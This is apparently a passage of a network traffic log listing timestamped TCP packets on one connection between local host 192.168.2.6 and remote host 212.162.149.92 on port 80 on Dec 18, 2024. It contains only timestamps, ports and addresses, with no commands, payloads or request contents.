Dec 18, 2024 11:05:13.600919962 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.600963116 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.682140112 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.682172060 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.682218075 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.682297945 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.753469944 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.753540993 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.753560066 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.753604889 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.757663012 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.757721901 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.757761955 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.757816076 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.766004086 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.766066074 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.766105890 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.766161919 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.774385929 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.774455070 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.774535894 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.774593115 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.782752991 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.782819033 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.782821894 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.782881021 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.791809082 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.791873932 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.791873932 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.791924000 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.797233105 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.797295094 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.797317028 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.797445059 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.805625916 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.805692911 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.805720091 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.805757999 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.814043045 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.814100027 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.814260960 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.814301968 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.822329044 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.822386026 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.822454929 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.822498083 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.829996109 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.830055952 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.830113888 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.830163002 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.873193979 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.873259068 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.944792032 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.944835901 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.944854975 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.944890022 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.947182894 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.947228909 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.947328091 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.947365046 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.952148914 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.952199936 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.952224016 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.952260971 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.957053900 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.957099915 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.957343102 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.957380056 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.962265015 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.962284088 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.962318897 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.962341070 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.966689110 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.966744900 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.966795921 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.966830015 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.971329927 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.971373081 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.971417904 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.971455097 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.976147890 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.976207018 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.976242065 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.976280928 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.980771065 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.980833054 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.980876923 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.980959892 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.985467911 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.985551119 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.987601042 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.987646103 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.987715006 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.987757921 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.992295027 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.992346048 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.992425919 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.992465019 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.997029066 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.997092009 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.997149944 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.997226954 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.001728058 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.001790047 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.001837015 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.001876116 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.006477118 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.006527901 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.006573915 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.006609917 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.010302067 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.010349989 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.010449886 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.010490894 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.014045954 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.014097929 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.014148951 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.014189959 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.017831087 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.017884970 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.017962933 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.018004894 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.021635056 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.021687031 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.021712065 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.021749020 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.025475025 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.025531054 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.025535107 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.025579929 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.029526949 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.029566050 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.029580116 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.029603004 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.033097029 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.033154011 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.033181906 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.033231974 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.065093040 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.065145016 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.065318108 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.066941977 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.067011118 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.136131048 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.136157990 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.136781931 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.137485981 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.137578964 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.137782097 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.140481949 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.140563011 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.140588045 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.142752886 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.257066965 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.257119894 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.257210016 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.257210016 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.259958029 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.259977102 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.260108948 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.376756907 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.376785040 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.377028942 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.379488945 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.379525900 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.379662991 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.496259928 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.496289015 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.496303082 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.496315956 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.496328115 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.496340036 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.496352911 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.496360064 CET  80        49868     212.162.149.92   192.168.2.6
                                                            Dec 18, 2024 11:05:14.496357918 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.496366024 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.496357918 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.496371984 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.496377945 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.496465921 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.496522903 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.496568918 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.496582985 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.496654987 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.496654987 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.496766090 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.496778011 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.496789932 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.496802092 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.496815920 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.496840000 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.496851921 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.496865034 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.496886015 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.496887922 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.496900082 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.496912003 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.496926069 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.496926069 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.496965885 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.496965885 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.497544050 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.497555971 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.497566938 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.497687101 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.497709036 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.497735977 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.497802973 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.497884035 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.497895956 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.497908115 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.497920036 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.497926950 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.497932911 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.497939110 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.497946024 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.497956038 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.497967958 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.498002052 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.498002052 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.498519897 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.498650074 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.498661995 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.498684883 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.498687983 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.498699903 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.498712063 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.498723984 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.498723984 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.498723984 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.498745918 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.498749971 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.498763084 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.498783112 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.498784065 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.498826981 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.498943090 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.499475956 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.499490023 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.499500036 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.499521971 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.499535084 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.499547005 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.499547958 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.499562979 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.499593973 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.499594927 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.499658108 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.499939919 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.499953985 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.499985933 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.500010014 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.500019073 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.500019073 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.500021935 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.500035048 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.500049114 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.500047922 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.500049114 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.500061989 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.500077009 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.500077009 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.500340939 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.500961065 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.500971079 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.500983953 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.500996113 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.501010895 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.501023054 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.501030922 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.501054049 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.501231909 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.501780987 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.501794100 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.501804113 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.501816034 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.501827955 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.501841068 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.501852989 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.501864910 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.501876116 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.501877069 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.501876116 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.501889944 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.501904011 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.501904011 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.501916885 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.501951933 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.502002001 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.502671957 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.502684116 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.502693892 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.502707005 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.502720118 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.502739906 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.502861977 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.503523111 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.503544092 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.503556013 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.503568888 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.503607988 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.503880978 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.504373074 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.504386902 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.504487991 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.504499912 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.504520893 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.504522085 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.504535913 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.504561901 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.504630089 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.505141973 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.505161047 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.505172968 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.505184889 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.505203962 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.505218029 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.505220890 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.505233049 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.505244970 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.505266905 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.505266905 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.505301952 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.518517017 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.518583059 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.616110086 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.616213083 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.616242886 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.616343021 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.617131948 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.617192984 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.617237091 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.617259979 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.619343996 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.619425058 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.619456053 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.621292114 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.621325016 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.621371031 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.621537924 CET4986880192.168.2.6212.162.149.92
